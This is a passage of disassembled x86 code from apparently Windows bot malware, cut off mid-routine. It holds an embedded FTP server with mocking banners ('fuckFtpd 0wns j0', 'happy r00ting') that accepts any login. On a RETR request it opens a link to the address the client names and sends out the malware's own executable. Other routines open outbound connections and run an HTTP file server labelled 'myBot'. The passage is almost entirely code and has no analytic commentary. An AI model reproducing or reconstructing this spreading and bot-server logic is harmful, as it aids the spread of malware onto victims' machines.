call dword_4211E4 ; socket
test esi, esi
mov edi, eax
jz short loc_4052E9
movsx eax, word ptr [esi+0Ah]
push eax
mov eax, [esi+0Ch]
push dword ptr [eax]
lea eax, [ebp-0Ch]
push eax
call sub_4153F0
add esp, 0Ch
jmp short loc_4052EC
; ---------------------------------------------------------------------------
loc_4052E9: ; CODE XREF: .text:004052CF�j
mov [ebp-0Ch], ebx
loc_4052EC: ; CODE XREF: .text:004052E7�j
test esi, esi
jz short loc_4052FA
mov ax, [esi+8]
mov [ebp-10h], ax
jmp short loc_405300
; ---------------------------------------------------------------------------
loc_4052FA: ; CODE XREF: .text:004052EE�j
mov word ptr [ebp-10h], 2
loc_405300: ; CODE XREF: .text:004052F8�j
push 598h
call dword_4211E0 ; ntohs
mov [ebp-0Eh], ax
lea eax, [ebp-10h]
push 10h
push eax
push edi
call dword_4211E8 ; connect
test eax, eax
jnz short loc_405381
push eax
push 152h
push offset dword_4265F0
push edi
call dword_4211F0 ; send
push 3E8h
call dword_421060 ; Sleep
sub esp, 0BCh
lea esi, [ebp+8]
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_40514F
add esp, 0BCh
test al, al
jz short loc_405361
xor eax, eax
inc eax
jmp short loc_405393
; ---------------------------------------------------------------------------
loc_405361: ; CODE XREF: .text:0040535A�j
lea eax, [ebp-210h]
push eax
call sub_40B078
mov eax, [ebp+0B0h]
pop ecx
imul eax, 3Ch
lea eax, dword_427390[eax]
inc dword ptr [eax]
jmp short loc_405391
; ---------------------------------------------------------------------------
loc_405381: ; CODE XREF: .text:0040531E�j
push 1
push edi
call dword_4211D0 ; shutdown
push edi
call dword_4211F4 ; closesocket
loc_405391: ; CODE XREF: .text:0040537F�j
xor eax, eax
loc_405393: ; CODE XREF: .text:0040535F�j
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405398 proc near ; DATA XREF: sub_4071B6+227�o
var_A6C = byte ptr -0A6Ch
var_8DC = byte ptr -8DCh
var_6DC = dword ptr -6DCh
var_6D8 = byte ptr -6D8h
var_4C4 = byte ptr -4C4h
var_444 = dword ptr -444h
var_440 = dword ptr -440h
var_438 = dword ptr -438h
var_334 = byte ptr -334h
var_2D0 = byte ptr -2D0h
var_29C = byte ptr -29Ch
var_238 = dword ptr -238h
var_234 = dword ptr -234h
var_230 = dword ptr -230h
var_134 = byte ptr -134h
var_124 = byte ptr -124h
var_F8 = byte ptr -0F8h
var_C4 = byte ptr -0C4h
var_AC = byte ptr -0ACh
var_48 = byte ptr -48h
var_38 = word ptr -38h
var_36 = word ptr -36h
var_34 = dword ptr -34h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0A6Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
xor ebx, ebx
mov ecx, 0A9h
mov esi, eax
lea edi, [ebp+var_6DC]
inc ebx
rep movsd
mov [eax+2A0h], ebx
lea eax, [ebp+var_A6C]
xor edi, edi
push eax
push 101h
mov [ebp+var_24], ebx
mov [ebp+var_28], ebx
mov [ebp+var_238], edi
mov [ebp+var_438], edi
call dword_4211B4 ; WSAStartup
push edi
call sub_41697B
push eax
call sub_415368
push 0FA00h
push 471h
call sub_413F12
add esp, 10h
mov dword_43B670, eax
push edi
push ebx
push 2
call dword_4211E4 ; socket
mov esi, eax
lea eax, [ebp+var_24]
push 4
push eax
push 4
push 0FFFFh
push esi
mov [ebp+var_C], esi
call dword_4211B8 ; setsockopt
lea eax, [ebp+var_28]
push eax
push 8004667Eh
push esi
call dword_4211BC ; ioctlsocket
mov ax, word ptr dword_43B670
mov [ebp+var_38], 2
push eax
mov [ebp+var_34], edi
call dword_4211E0 ; ntohs
mov [ebp+var_36], ax
lea eax, [ebp+var_38]
push 10h
push eax
push esi
call dword_4211C0 ; bind
test eax, eax
jge short loc_40546D
mov eax, ebx
jmp loc_405978
; ---------------------------------------------------------------------------
loc_40546D: ; CODE XREF: sub_405398+CC�j
push 0Ah
push esi
call dword_4211C4 ; listen
mov [ebp+var_238], ebx
mov ebx, dword_4211F0
mov [ebp+var_234], esi
mov [ebp+var_4], esi
loc_40548B: ; CODE XREF: sub_405398+12A�j
; sub_405398+5D8�j
push 41h
lea esi, [ebp+var_238]
pop ecx
lea edi, [ebp+var_438]
rep movsd
xor edi, edi
lea eax, [ebp+var_438]
push edi
push edi
push edi
push eax
mov eax, [ebp+var_4]
inc eax
push eax
call dword_4211D4 ; select
cmp eax, 0FFFFFFFFh
jz loc_405975
cmp [ebp+var_4], edi
mov [ebp+arg_0], edi
jl short loc_40548B
loc_4054C4: ; CODE XREF: sub_405398+5D2�j
xor esi, esi
push 64h
lea eax, [ebp+var_29C]
push esi
push eax
call sub_415390
push 64h
lea eax, [ebp+var_AC]
push esi
push eax
call sub_415390
add esp, 18h
lea eax, [ebp+var_438]
push eax
push edi
call sub_420A06 ; __WSAFDIsSet
test eax, eax
jz loc_405963
cmp edi, [ebp+var_C]
jnz short loc_40556D
lea eax, [ebp+var_1C]
mov [ebp+var_1C], 10h
push eax
lea eax, [ebp+var_134]
push eax
push [ebp+var_C]
call dword_4211C8 ; accept
cmp eax, 0FFFFFFFFh
jz loc_405963
mov edx, [ebp+var_238]
xor ecx, ecx
cmp edx, esi
jbe short loc_40553F
loc_405531: ; CODE XREF: sub_405398+1A5�j
cmp [ebp+ecx*4+var_234], eax
jz short loc_40553F
inc ecx
cmp ecx, edx
jb short loc_405531
loc_40553F: ; CODE XREF: sub_405398+197�j
; sub_405398+1A0�j
cmp ecx, edx
jnz short loc_405555
cmp edx, 40h
jnb short loc_405555
mov [ebp+ecx*4+var_234], eax
inc [ebp+var_238]
loc_405555: ; CODE XREF: sub_405398+1A9�j
; sub_405398+1AE�j
cmp eax, [ebp+var_4]
jle short loc_40555D
mov [ebp+var_4], eax
loc_40555D: ; CODE XREF: sub_405398+1C0�j
push esi
push 15h
push offset a220Fuckftpd0wn ; "220 fuckFtpd 0wns j0\n"
push eax
call ebx ; send
jmp loc_405963
; ---------------------------------------------------------------------------
loc_40556D: ; CODE XREF: sub_405398+167�j
push esi
lea eax, [ebp+var_29C]
push 64h
push eax
push edi
call dword_4211EC ; recv
test eax, eax
jg short loc_4055CA
mov ecx, [ebp+var_238]
xor eax, eax
cmp ecx, esi
jbe short loc_4055BE
loc_40558E: ; CODE XREF: sub_405398+202�j
cmp [ebp+eax*4+var_234], edi
jz short loc_4055B3
inc eax
cmp eax, ecx
jb short loc_40558E
jmp short loc_4055BE
; ---------------------------------------------------------------------------
loc_40559E: ; CODE XREF: sub_405398+21E�j
mov ecx, [ebp+eax*4+var_230]
mov [ebp+eax*4+var_234], ecx
mov ecx, [ebp+var_238]
inc eax
loc_4055B3: ; CODE XREF: sub_405398+1FD�j
dec ecx
cmp eax, ecx
jb short loc_40559E
dec [ebp+var_238]
loc_4055BE: ; CODE XREF: sub_405398+1F4�j
; sub_405398+204�j
push edi
call dword_4211F4 ; closesocket
jmp loc_405963
; ---------------------------------------------------------------------------
loc_4055CA: ; CODE XREF: sub_405398+1E8�j
lea eax, [ebp+var_334]
push eax
lea eax, [ebp+var_AC]
push eax
lea eax, [ebp+var_29C]
push offset aSS ; "%s %s"
push eax
call sub_416947
lea eax, [ebp+var_AC]
push offset aUser_0 ; "USER"
push eax
call sub_415730
add esp, 18h
test eax, eax
jnz short loc_40560E
push esi
push 16h
push offset a331PasswordReq ; "331 Password required\n"
jmp loc_40594E
; ---------------------------------------------------------------------------
loc_40560E: ; CODE XREF: sub_405398+267�j
lea eax, [ebp+var_AC]
push offset aPass ; "PASS"
push eax
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz short loc_405632
push esi
push 14h
push offset a230UserLoggedI ; "230 User logged in.\n"
jmp loc_40594E
; ---------------------------------------------------------------------------
loc_405632: ; CODE XREF: sub_405398+28B�j
lea eax, [ebp+var_AC]
push offset aSyst ; "SYST"
push eax
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz short loc_405656
push esi
push 0Dh
push offset a215Fuckftpd ; "215 fuckFtpd\n"
jmp loc_40594E
; ---------------------------------------------------------------------------
loc_405656: ; CODE XREF: sub_405398+2AF�j
lea eax, [ebp+var_AC]
push offset aRest ; "REST"
push eax
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz short loc_40567A
push esi
push 10h
push offset a350Restarting_ ; "350 Restarting.\n"
jmp loc_40594E
; ---------------------------------------------------------------------------
loc_40567A: ; CODE XREF: sub_405398+2D3�j
lea eax, [ebp+var_AC]
push offset off_42694C
push eax
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz short loc_40569E
push esi
push 1Eh
push offset a257IsCurrentDi ; "257 \"/\" is current directory.\n"
jmp loc_40594E
; ---------------------------------------------------------------------------
loc_40569E: ; CODE XREF: sub_405398+2F7�j
lea eax, [ebp+var_AC]
push offset aType ; "TYPE"
push eax
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz short loc_4056D9
lea eax, [ebp+var_334]
push offset aA ; "A"
push eax
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz short loc_4056D9
push esi
push 13h
push offset a200TypeSetToA_ ; "200 Type set to A.\n"
jmp loc_40594E
; ---------------------------------------------------------------------------
loc_4056D9: ; CODE XREF: sub_405398+31B�j
; sub_405398+332�j
lea eax, [ebp+var_AC]
push offset aType ; "TYPE"
push eax
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz short loc_405714
lea eax, [ebp+var_334]
push offset aI ; "I"
push eax
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz short loc_405714
push esi
push 13h
push offset a200TypeSetToI_ ; "200 Type set to I.\n"
jmp loc_40594E
; ---------------------------------------------------------------------------
loc_405714: ; CODE XREF: sub_405398+356�j
; sub_405398+36D�j
lea eax, [ebp+var_AC]
push offset aPasv ; "PASV"
push eax
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz short loc_405762
push 0Ah
mov esi, offset a425PassiveNotS ; "425 Passive not supported on this serve"...
pop ecx
lea edi, [ebp+var_124]
rep movsd
push eax
lea eax, [ebp+var_124]
push eax
movsw
call sub_415B10
pop ecx
push eax
lea eax, [ebp+var_124]
loc_405752: ; CODE XREF: sub_405398+409�j
push eax
push [ebp+arg_0]
call ebx ; send
mov edi, [ebp+arg_0]
xor esi, esi
jmp loc_405951
; ---------------------------------------------------------------------------
loc_405762: ; CODE XREF: sub_405398+391�j
lea eax, [ebp+var_AC]
push offset aList ; "LIST"
push eax
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz short loc_4057A3
push 5
mov esi, offset a226TransferCom ; "226 Transfer complete\n"
pop ecx
lea edi, [ebp+var_C4]
rep movsd
movsw
push eax
lea eax, [ebp+var_C4]
push eax
movsb
call sub_415B10
pop ecx
push eax
lea eax, [ebp+var_C4]
jmp short loc_405752
; ---------------------------------------------------------------------------
loc_4057A3: ; CODE XREF: sub_405398+3DF�j
lea eax, [ebp+var_AC]
push offset aPort ; "PORT"
push eax
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz loc_405874
lea eax, [ebp+var_2D0]
push eax
lea eax, [ebp+var_F8]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_29C]
push offset aS ; "%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^\n]"...
push eax
call sub_416947
lea eax, [ebp+var_F8]
push eax
call sub_41587F
mov [ebp+var_8], eax
lea eax, [ebp+var_2D0]
push eax
call sub_41587F
mov [ebp+arg_0], eax
push 32h
lea eax, [ebp+var_F8]
push esi
push eax
call sub_415390
push [ebp+arg_0]
lea eax, [ebp+var_F8]
push [ebp+var_8]
push offset aXX ; "%x%x\n"
push eax
call sub_415316
add esp, 44h
lea eax, [ebp+var_F8]
push 10h
push esi
push eax
call sub_416930
mov [ebp+var_8], eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_48]
push offset aS_S_S_S ; "%s.%s.%s.%s"
push eax
call sub_415316
add esp, 24h
push esi
push 1Dh
push offset a200PortCommand ; "200 PORT command successful.\n"
jmp loc_40594E
; ---------------------------------------------------------------------------
loc_405874: ; CODE XREF: sub_405398+420�j
lea eax, [ebp+var_AC]
push offset aRetr ; "RETR"
push eax
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz loc_40592F
push esi
push 28h
push offset a150OpeningBina ; "150 Opening BINARY mode data connection"...
push edi
call ebx ; send
push [ebp+var_8]
lea eax, [ebp+var_48]
push eax
call sub_40597F
pop ecx
cmp eax, 1
pop ecx
jnz short loc_405925
call sub_4059FC
cmp eax, 1
jnz loc_405951
push esi
push 17h
push offset a226TransferC_0 ; "226 Transfer complete.\n"
push edi
call ebx ; send
lea eax, [ebp+var_6D8]
push eax
lea eax, [ebp+var_48]
push dword_43B670
push eax
lea eax, [ebp+var_8DC]
push offset dword_426790
push eax
call sub_415316
add esp, 14h
cmp [ebp+var_440], esi
jnz short loc_405916
push esi
lea eax, [ebp+var_8DC]
push [ebp+var_444]
push eax
lea eax, [ebp+var_4C4]
push eax
push [ebp+var_6DC]
call sub_412BD1
add esp, 14h
loc_405916: ; CODE XREF: sub_405398+559�j
lea eax, [ebp+var_8DC]
push eax
call sub_40B078
pop ecx
jmp short loc_405951
; ---------------------------------------------------------------------------
loc_405925: ; CODE XREF: sub_405398+513�j
push esi
push 20h
push offset a425CanTOpenDat ; "425 Can't open data connection.\n"
jmp short loc_40594E
; ---------------------------------------------------------------------------
loc_40592F: ; CODE XREF: sub_405398+4F1�j
lea eax, [ebp+var_AC]
push offset aQuit ; "QUIT"
push eax
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz short loc_405951
push esi
push 1Bh
push offset a221GoodbyeHapp ; "221 Goodbye happy r00ting.\n"
loc_40594E: ; CODE XREF: sub_405398+271�j
; sub_405398+295�j ...
push edi
call ebx ; send
loc_405951: ; CODE XREF: sub_405398+3C5�j
; sub_405398+51D�j ...
push 64h
lea eax, [ebp+var_29C]
push esi
push eax
call sub_415390
add esp, 0Ch
loc_405963: ; CODE XREF: sub_405398+15E�j
; sub_405398+187�j ...
inc edi
cmp edi, [ebp+var_4]
mov [ebp+arg_0], edi
jle loc_4054C4
jmp loc_40548B
; ---------------------------------------------------------------------------
loc_405975: ; CODE XREF: sub_405398+11E�j
xor eax, eax
inc eax
loc_405978: ; CODE XREF: sub_405398+D0�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_405398 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40597F proc near ; CODE XREF: sub_405398+509�p
var_1A0 = byte ptr -1A0h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 1A0h
lea eax, [ebp+var_1A0]
push eax
push 101h
call dword_4211B4 ; WSAStartup
push 0
push 1
push 2
call dword_4211E4 ; socket
push [ebp+arg_0]
mov dword_43B66C, eax
mov [ebp+var_10], 2
call dword_4211DC ; inet_addr
push [ebp+arg_4]
mov [ebp+var_C], eax
call dword_4211E0 ; ntohs
mov [ebp+var_E], ax
lea eax, [ebp+var_10]
push 10h
push eax
push dword_43B66C
call dword_4211E8 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_4059F7
push dword_43B66C
call dword_4211F4 ; closesocket
call dword_4211B0 ; WSACleanup
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_4059F7: ; CODE XREF: sub_40597F+60�j
xor eax, eax
inc eax
leave
retn
sub_40597F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4059FC proc near ; CODE XREF: sub_405398+515�p
var_504 = byte ptr -504h
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 504h
push esi
lea eax, [ebp+var_104]
push 104h
push eax
push 0
call dword_42107C ; GetModuleFileNameA
lea eax, [ebp+var_104]
push offset aRb ; "rb"
push eax
call sub_415A08
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_405A93
test byte ptr [esi+0Ch], 10h
jnz short loc_405A77
push edi
mov edi, 400h
loc_405A3F: ; CODE XREF: sub_4059FC+78�j
push esi
push 1
lea eax, [ebp+var_504]
push edi
push eax
call sub_416A57
add esp, 10h
lea eax, [ebp+var_504]
push 0
push edi
push eax
push dword_43B66C
call dword_4211F0 ; send
push 1
call dword_421060 ; Sleep
test byte ptr [esi+0Ch], 10h
jz short loc_405A3F
pop edi
loc_405A77: ; CODE XREF: sub_4059FC+3B�j
push esi
call sub_415960
pop ecx
push dword_43B66C
call dword_4211F4 ; closesocket
call dword_4211B0 ; WSACleanup
xor eax, eax
inc eax
loc_405A93: ; CODE XREF: sub_4059FC+35�j
pop esi
leave
retn
sub_4059FC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405A96 proc near ; DATA XREF: sub_4071B6+333�o
; sub_40CD3A+5007�o
var_28F0 = byte ptr -28F0h
var_18F0 = byte ptr -18F0h
var_8F0 = byte ptr -8F0h
var_6F0 = byte ptr -6F0h
var_5EC = dword ptr -5ECh
var_5E8 = byte ptr -5E8h
var_360 = byte ptr -360h
var_25C = dword ptr -25Ch
var_254 = dword ptr -254h
var_250 = dword ptr -250h
var_24C = dword ptr -24Ch
var_248 = dword ptr -248h
var_23C = byte ptr -23Ch
var_138 = byte ptr -138h
var_128 = dword ptr -128h
var_124 = dword ptr -124h
var_120 = dword ptr -120h
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 28F0h
call sub_415B90
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov ecx, 0ECh
mov esi, eax
lea edi, [ebp+var_5EC]
xor ebx, ebx
rep movsd
xor esi, esi
push 10h
inc esi
push ebx
mov [eax+3ACh], esi
lea eax, [ebp+var_24]
push eax
mov [ebp+var_14], esi
call sub_415390
add esp, 0Ch
mov [ebp+var_24], 2
push [ebp+var_25C]
call dword_43CA24 ; ntohs
push ebx
push esi
push 2
mov [ebp+var_22], ax
mov [ebp+var_20], ebx
call dword_43CAA4 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_8], edi
jz loc_405E5C
mov eax, [ebp+var_254]
push 10h
imul eax, 234h
mov dword_441BA4[eax], edi
lea eax, [ebp+var_24]
push eax
push edi
call dword_43CA50 ; bind
cmp eax, 0FFFFFFFFh
jz loc_405E5C
push 7FFFFFFFh
push edi
call dword_43CA4C ; listen
cmp eax, 0FFFFFFFFh
jz loc_405E5C
lea eax, [ebp+var_14]
push eax
push 8004667Eh
push edi
call dword_43CAC0 ; ioctlsocket
cmp eax, 0FFFFFFFFh
jz loc_405E5C
mov ebx, esi
mov [ebp+var_124], edi
mov [ebp+var_128], ebx
mov [ebp+var_4], edi
loc_405B6D: ; CODE XREF: sub_405A96+3BC�j
push 41h
xor eax, eax
pop ecx
lea esi, [ebp+var_128]
push eax
push eax
push eax
lea eax, [ebp+var_6F0]
push eax
mov eax, [ebp+var_4]
lea edi, [ebp+var_6F0]
inc eax
rep movsd
push eax
call dword_43CA0C ; select
cmp eax, 0FFFFFFFFh
jz loc_405E57
xor edi, edi
mov [ebp+arg_0], edi
loc_405BA3: ; CODE XREF: sub_405A96+3B6�j
lea eax, [ebp+var_6F0]
push eax
push edi
call dword_43C91C ; __WSAFDIsSet
test eax, eax
jz loc_405E42
cmp edi, [ebp+var_8]
jnz short loc_405C24
lea eax, [ebp+var_C]
mov [ebp+var_C], 10h
push eax
lea eax, [ebp+var_138]
push eax
push [ebp+var_8]
call dword_43CAB8 ; accept
cmp eax, 0FFFFFFFFh
jz loc_405E42
xor ecx, ecx
test ebx, ebx
jbe short loc_405BF6
loc_405BE8: ; CODE XREF: sub_405A96+15E�j
cmp [ebp+ecx*4+var_124], eax
jz short loc_405BF6
inc ecx
cmp ecx, ebx
jb short loc_405BE8
loc_405BF6: ; CODE XREF: sub_405A96+150�j
; sub_405A96+159�j
cmp ecx, ebx
jnz short loc_405C13
cmp ebx, 40h
jnb short loc_405C13
mov [ebp+ecx*4+var_124], eax
mov ebx, [ebp+var_128]
inc ebx
mov [ebp+var_128], ebx
loc_405C13: ; CODE XREF: sub_405A96+162�j
; sub_405A96+167�j
cmp eax, [ebp+var_4]
jbe loc_405E42
mov [ebp+var_4], eax
jmp loc_405E42
; ---------------------------------------------------------------------------
loc_405C24: ; CODE XREF: sub_405A96+126�j
mov esi, 1000h
lea eax, [ebp+var_28F0]
push esi
push 0
push eax
call sub_415390
push esi
lea eax, [ebp+var_18F0]
push 0
push eax
call sub_415390
add esp, 18h
lea eax, [ebp+var_28F0]
push 0
push esi
push eax
push edi
call dword_43CA3C ; recv
test eax, eax
jg short loc_405CAB
push edi
call dword_43CABC ; closesocket
xor eax, eax
test ebx, ebx
jbe loc_405E42
loc_405C70: ; CODE XREF: sub_405A96+1E6�j
cmp [ebp+eax*4+var_124], edi
jz short loc_405C98
inc eax
cmp eax, ebx
jb short loc_405C70
jmp loc_405E42
; ---------------------------------------------------------------------------
loc_405C83: ; CODE XREF: sub_405A96+207�j
mov ecx, [ebp+eax*4+var_120]
mov [ebp+eax*4+var_124], ecx
mov ebx, [ebp+var_128]
inc eax
loc_405C98: ; CODE XREF: sub_405A96+1E1�j
lea ecx, [ebx-1]
cmp eax, ecx
jb short loc_405C83
dec ebx
mov [ebp+var_128], ebx
jmp loc_405E42
; ---------------------------------------------------------------------------
loc_405CAB: ; CODE XREF: sub_405A96+1C7�j
xor esi, esi
push 104h
lea eax, [ebp+var_23C]
push esi
push eax
call sub_415390
lea eax, [ebp+var_28F0]
xor edi, edi
push eax
call sub_415B10
add esp, 10h
test eax, eax
jbe loc_405E42
loc_405CD8: ; CODE XREF: sub_405A96+2F9�j
mov al, [ebp+edi+var_28F0]
cmp al, 0Ah
mov [ebp+esi+var_18F0], al
jnz loc_405D7E
mov esi, offset aGet ; "GET "
lea eax, [ebp+var_18F0]
push esi
push eax
call sub_4158E0
pop ecx
test eax, eax
pop ecx
jz short loc_405D4E
lea eax, [ebp+var_18F0]
push eax
call sub_415B10
cmp eax, 5
pop ecx
jbe short loc_405D4E
mov eax, offset asc_426A34 ; " "
push eax
push eax
lea eax, [ebp+var_18F0]
push esi
push eax
call sub_4158E0
pop ecx
pop ecx
push eax
call sub_4158E0
pop ecx
pop ecx
push eax
call sub_416B3F
push eax
lea eax, [ebp+var_23C]
push eax
call sub_415A20
add esp, 10h
jmp short loc_405D65
; ---------------------------------------------------------------------------
loc_405D4E: ; CODE XREF: sub_405A96+26E�j
; sub_405A96+280�j
lea eax, [ebp+var_18F0]
push offset asc_426A30 ; "\r\n"
push eax
call sub_415730
pop ecx
test eax, eax
pop ecx
jz short loc_405D9A
loc_405D65: ; CODE XREF: sub_405A96+2B6�j
push 1000h
lea eax, [ebp+var_18F0]
push 0
push eax
call sub_415390
add esp, 0Ch
or esi, 0FFFFFFFFh
loc_405D7E: ; CODE XREF: sub_405A96+252�j
lea eax, [ebp+var_28F0]
inc edi
push eax
inc esi
call sub_415B10
cmp edi, eax
pop ecx
jb loc_405CD8
jmp loc_405E42
; ---------------------------------------------------------------------------
loc_405D9A: ; CODE XREF: sub_405A96+2CD�j
xor eax, eax
test ebx, ebx
jbe short loc_405DD6
loc_405DA0: ; CODE XREF: sub_405A96+319�j
mov ecx, [ebp+eax*4+var_124]
cmp ecx, [ebp+arg_0]
jz short loc_405DC8
inc eax
cmp eax, ebx
jb short loc_405DA0
jmp short loc_405DD6
; ---------------------------------------------------------------------------
loc_405DB3: ; CODE XREF: sub_405A96+337�j
mov ecx, [ebp+eax*4+var_120]
mov [ebp+eax*4+var_124], ecx
mov ebx, [ebp+var_128]
inc eax
loc_405DC8: ; CODE XREF: sub_405A96+314�j
lea ecx, [ebx-1]
cmp eax, ecx
jb short loc_405DB3
dec ebx
mov [ebp+var_128], ebx
loc_405DD6: ; CODE XREF: sub_405A96+308�j
; sub_405A96+31B�j
lea eax, [ebp+var_360]
push eax
call sub_415B10
mov esi, eax
lea eax, [ebp+var_23C]
push eax
call sub_415B10
add esi, eax
pop ecx
cmp esi, 104h
pop ecx
jnb short loc_405E39
and [ebp+var_10], 0
lea eax, [ebp+var_10]
push eax
push 8004667Eh
push [ebp+arg_0]
call dword_43CAC0 ; ioctlsocket
push [ebp+var_254]
lea eax, [ebp+var_23C]
push [ebp+var_248]
push eax
lea eax, [ebp+var_360]
push eax
push [ebp+arg_0]
call sub_406048
add esp, 14h
jmp short loc_405E42
; ---------------------------------------------------------------------------
loc_405E39: ; CODE XREF: sub_405A96+364�j
push [ebp+arg_0]
call dword_43CABC ; closesocket
loc_405E42: ; CODE XREF: sub_405A96+11D�j
; sub_405A96+146�j ...
mov edi, [ebp+arg_0]
inc edi
cmp edi, [ebp+var_4]
mov [ebp+arg_0], edi
jbe loc_405BA3
jmp loc_405B6D
; ---------------------------------------------------------------------------
loc_405E57: ; CODE XREF: sub_405A96+102�j
mov edi, [ebp+var_8]
xor ebx, ebx
loc_405E5C: ; CODE XREF: sub_405A96+6A�j
; sub_405A96+92�j ...
call dword_43C9B8 ; WSAGetLastError
push eax
lea eax, [ebp+var_8F0]
push offset unk_4269E8
push eax
call sub_415316
add esp, 0Ch
cmp [ebp+var_24C], ebx
jnz short loc_405EA2
push ebx
lea eax, [ebp+var_8F0]
push [ebp+var_250]
push eax
lea eax, [ebp+var_5E8]
push eax
push [ebp+var_5EC]
call sub_412BD1
add esp, 14h
loc_405EA2: ; CODE XREF: sub_405A96+3E7�j
lea eax, [ebp+var_8F0]
push eax
call sub_40B078
pop ecx
push edi
call dword_43CABC ; closesocket
push [ebp+var_254]
call sub_4150F0
pop ecx
push ebx
call dword_421048 ; ExitThread
pop edi
pop esi
pop ebx
sub_405A96 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405ECC proc near ; DATA XREF: sub_406048+245�o
var_1654 = byte ptr -1654h
var_654 = byte ptr -654h
var_550 = byte ptr -550h
var_44C = dword ptr -44Ch
var_3C8 = byte ptr -3C8h
var_2C4 = byte ptr -2C4h
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_A4 = dword ptr -0A4h
var_9C = byte ptr -9Ch
var_68 = byte ptr -68h
var_20 = byte ptr -20h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1654h
call sub_415B90
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 0ECh
mov esi, eax
lea edi, [ebp+var_44C]
rep movsd
mov dword ptr [eax+3ACh], 1
lea eax, [ebp+var_3C8]
push eax
lea eax, [ebp+var_550]
push eax
call sub_415316
lea eax, [ebp+var_2C4]
push eax
lea eax, [ebp+var_654]
push eax
call sub_415316
xor edi, edi
add esp, 10h
cmp [ebp+var_A4], edi
lea eax, [ebp+var_9C]
jz short loc_405F37
push offset aTextHtml ; "text/html"
jmp short loc_405F3C
; ---------------------------------------------------------------------------
loc_405F37: ; CODE XREF: sub_405ECC+62�j
push offset aApplicationOct ; "application/octet-stream"
loc_405F3C: ; CODE XREF: sub_405ECC+69�j
push eax
call sub_415316
pop ecx
lea eax, [ebp+var_68]
pop ecx
mov esi, 409h
push 46h
push eax
push offset aDddDdMmmYyyy ; "ddd, dd MMM yyyy"
push edi
push edi
push esi
call dword_421084 ; GetDateFormatA
lea eax, [ebp+var_20]
push 1Eh
push eax
push offset aHhMmSs ; "HH:mm:ss"
push edi
push edi
push esi
call dword_421080 ; GetTimeFormatA
lea eax, [ebp+var_20]
cmp [ebp+var_B8], 0FFFFFFFFh
push eax
lea eax, [ebp+var_68]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_68]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_68]
push eax
lea eax, [ebp+var_9C]
jnz short loc_405FAF
push eax
lea eax, [ebp+var_1654]
push offset aHttp1_0200OkSe ; "HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...
push eax
call sub_415316
add esp, 24h
jmp short loc_405FCA
; ---------------------------------------------------------------------------
loc_405FAF: ; CODE XREF: sub_405ECC+CA�j
push [ebp+var_B8]
push eax
lea eax, [ebp+var_1654]
push offset aHttp1_0200Ok_0 ; "HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...
push eax
call sub_415316
add esp, 28h
loc_405FCA: ; CODE XREF: sub_405ECC+E1�j
lea eax, [ebp+var_1654]
push edi
push eax
call sub_415B10
pop ecx
push eax
lea eax, [ebp+var_1654]
push eax
push [ebp+var_44C]
call dword_43CA74 ; send
cmp [ebp+var_A4], edi
jnz short loc_40600A
lea eax, [ebp+var_550]
push eax
push [ebp+var_44C]
call sub_406978
pop ecx
pop ecx
jmp short loc_406027
; ---------------------------------------------------------------------------
loc_40600A: ; CODE XREF: sub_405ECC+126�j
lea eax, [ebp+var_654]
push eax
push edi
push [ebp+var_44C]
lea eax, [ebp+var_550]
push eax
call sub_4062F7
add esp, 10h
loc_406027: ; CODE XREF: sub_405ECC+13C�j
push [ebp+var_44C]
